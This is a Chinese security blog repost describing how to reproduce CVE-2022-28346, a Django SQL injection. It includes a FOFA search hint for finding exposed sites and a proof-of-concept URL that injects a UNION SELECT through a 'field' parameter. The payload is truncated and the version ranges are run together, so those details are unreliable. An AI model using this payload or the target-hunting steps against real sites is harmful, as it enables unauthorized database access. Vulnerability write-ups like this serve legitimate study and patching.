CVE-2022-28346 Django SQL注入漏洞

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 CVE-2022-28346 Django SQL注入漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

 Django是用Python开发的一个免费开源的Web框架,几乎囊括了Web应用的方方面面,可以用于快速搭建高性能、优雅的网站,Django提供了许多网站后台开发经常用到的模块,使开发者能够专注于业务部

0x03 漏洞复现

漏洞影响: 

  • 4.0 <= Django < 4.0.43.2 <= Django < 3.2.132.2 <= Django < 2.2.28

FOFA:Django

1.通过404页面可以发现存在哪些接口

http://x.x.x.x:8080/404
图片[1]-CVE-2022-28346 Django SQL注入漏洞-安全小天地

2.使用poc,执行注入

http://x.x.x.x:8080/demo/?field=demo.name%22%20FROM%20%22demo_user%22%20union%20SELECT%20%221%22,sqlit
图片[2]-CVE-2022-28346 Django SQL注入漏洞-安全小天地
------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞10 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容